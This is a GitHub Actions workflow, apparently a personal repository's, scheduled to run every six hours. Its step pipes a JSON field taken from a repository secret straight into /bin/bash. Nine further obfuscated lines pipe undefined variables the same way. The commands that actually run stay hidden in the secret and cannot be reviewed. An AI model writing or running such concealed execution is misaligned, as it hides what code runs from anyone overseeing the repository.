name: zhoujinwei2345
on:
  workflow_dispatch:
  schedule:
    - cron: '2 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhoujinwei2345
        env:
          alqq81: ${{ secrets.alqq81 }}
        run: |
          echo $alqq81 | jq -r .qx52 | /bin/bash
          echo $fj65883 | jq -r .ea15554 | /bin/bash
          echo $rrvj2 | jq -r .rney4293 | /bin/bash
          echo $z5192 | jq -r .resm1 | /bin/bash
          echo $dgfz562 | jq -r .bqqgz2 | /bin/bash
          echo $f36 | jq -r .dqlal2 | /bin/bash
          echo $xrltx2 | jq -r .t5178 | /bin/bash
          echo $bccdc546 | jq -r .s661 | /bin/bash
          echo $ibx5296 | jq -r .qrh0050 | /bin/bash
          echo $l05 | jq -r .rz378 | /bin/bash

